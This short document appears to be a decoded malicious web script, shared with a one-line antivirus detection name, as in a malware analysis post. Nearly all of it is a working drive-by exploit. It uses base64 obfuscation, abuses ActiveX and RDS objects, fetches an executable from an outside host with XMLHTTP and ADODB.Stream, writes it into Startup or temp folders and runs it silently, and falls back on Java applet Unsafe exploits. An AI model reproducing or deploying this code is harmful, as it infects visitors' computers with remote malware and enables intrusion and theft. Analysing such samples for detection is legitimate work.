Script decodes to;
<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>
<div id=gHVGmTbb></div>
<script language="JavaScript" defer>
var CT='other';
if(document.all) {
document.all[0].style.behavior = 'url("#default#clientCaps")';
if(document.all[0].connectionType=='modem') { CT='modem'; }
}
var tLcYIKX = hLxTk("aHR0cDovL2luaTcuY29tLw==");
function LyRONoHV(o, n)
{
var r = null;
try { eval('r = o.CreateObject(n)') } catch(e){}
if (!r) {try { eval('r = o.CreateObject(n, "")') } catch(e){}}
if (!r) {try { eval('r = o.CreateObject(n, "", "")') } catch(e){}}
if (!r) {try { eval('r = o.GetObject("", n)') } catch(e){}}
if (!r) {try { eval('r = o.GetObject(n, "")') } catch(e){}}
if (!r) {try { eval('r = o.GetObject(n)') } catch(e){}}
return(r);
}
function OjWHT(a, ii, uu)
{
var xml = null;
var ws,o,ee,dat;
var bin = "\\"+ii+"10092.e"+"xe";
var dd;
try
{
xml = new XMLHttpRequest();
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TWljcm9zb2Z0LlhNTEhUVFA="));
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TVNYTUwyLlhNTEhUVFA="));
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TVNYTUwyLlNlcnZlclhNTEhUVFA="));
} catch(e) { return(-1); }
}
}
}
if (!xml) return(-1);
try
{
ws = LyRONoHV(a, hLxTk("V1NjcmlwdC5TaGVsbA=="));
o = LyRONoHV(a, hLxTk("QURPREIuU3RyZWFt"));
xml.open("G"+"ET", uu, false);
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
} catch(e) { return(-1); }
try { dd = ee.Item("TE"+"MP"); ee = ws.Environment("Process"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = ws.SpecialFolders("Startup"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = ws.SpecialFolders("AllUsersStartup"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\RECYCLER\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\RECYCLED\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
return(-1);
}
}
}
}
}
}
try { ws.Run(dd+bin,0); } catch(e) {
try { ws.Exec(dd+bin); } catch(e) {
try { ws = LyRONoHV(a, "Shell.Application"); ws.ShellExecute(dd+bin); } catch(e) {
try { ws = "gHVGmTbb.innerHTML=\"<object classid='cl"+"sid:527"+"196a4-b1a3-4647-931d-37ba5"+"af23037' codebase='\"+dd+bin+\"'></ob"+"ject>\";"; eval(ws); } catch(e) {
return(-1);
}
}
}
}
return(1);
}
function lZbkOGBy(ii, uu)
{
var i = 0;
var t = new Array('e0JEOTZDNTU2LTY1QTMtMTFEMC05ODNBLTAwQzA0RkMyOUUzNn0=','e0FCOUJDRURELUVDN0UtNDdFMS05MzIyLUQ0QTIxMDYxNzExNn0=','ezAwMDZGMDMzLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0Nn0=','ezAwMDZGMDNBLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0Nn0=','ezZlMzIwNzBhLTc2NmQtNGVlNi04NzljLWRjMWZhOTFkMmZjM30=','ezY0MTQ1MTJCLUI5NzgtNDUxRC1BMEQ4LUZDRkRGMzNFODMzQ30=','ezdGNUI3RjYzLUYwNkYtNDMzMS04QTI2LTMzOUUwM0MwQUUzRH0=','ezA2NzIzRTA5LUY0QzItNDNjOC04MzU4LTA5RkNEMURCMDc2Nn0=','ezYzOUY3MjVGLTFCMkQtNDgzMS1BOUZELTg3NDg0NzY4MjAxMH0=','e0JBMDE4NTk5LTFEQjMtNDRmOS04M0I0LTQ2MTQ1NEM4NEJGOH0=','e0QwQzA3RDU2LTdDNjktNDNGMS1CNEEwLTI1RjVBMTFGQUIxOX0=','e0U4Q0NDRERGLUNBMjgtNDk2Yi1CMDUwLTZDMDdDOTYyNDc2Qn0=', null);
var a,z;
while (t[i]) {
a = null;
z = hLxTk(t[i]);
if (z.substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("id", "oRDS"+i);
a.setAttribute("classid", "clsid:" + z.substring(1, z.length - 1));
} else {
try { a = new ActiveXObject(z); } catch(e){}
}
if (a) {
try
{
var b = LyRONoHV(a, "WScr"+"ipt.S"+"hell");
if (b) {
if (OjWHT(a, ii, uu) == 1) return(1);
}
} catch(e){}
}
i++;
}
return(-1);
}
function SGiwcV()
{
try {
var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
var unsafe = unsafemeth.invoke(unsafemeth, null);
document.maniman.foobar(unsafe);
var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
var chen = unsafe.allocateInstance(chenref);
chen.setURLdl(tLcYIKX);chen.setUname("10092");chen.setCID(CT);
chen.perse(unsafe);
} catch (d) {return(-1);}
return(1);
}
function CWXhIF()
{
document.write("<applet archive=Java2SE.jar code=Java2SE.class width=1 height=1 MAYSCRIPT><param name=usid value=10092><param name=uu value="+tLcYIKX+"><param name=tt value="+CT+"></applet>");
document.write("<applet archive=dsbr.jar code=MagicApplet.class width=1 height=1 name=dsbr MAYSCRIPT><param name=ModulePath value="+tLcYIKX+"?id=10092&t="+CT+"&o=2></applet>");
return(1);
}
if (lZbkOGBy('wn', tLcYIKX+"?id=10092&t="+CT+"&o=0") != 1) {
if (SGiwcV() != 1) {
CWXhIF();
document.write("see figure one");
}
}
</script>
Detected by AntiVir as HTML/Rce.Gen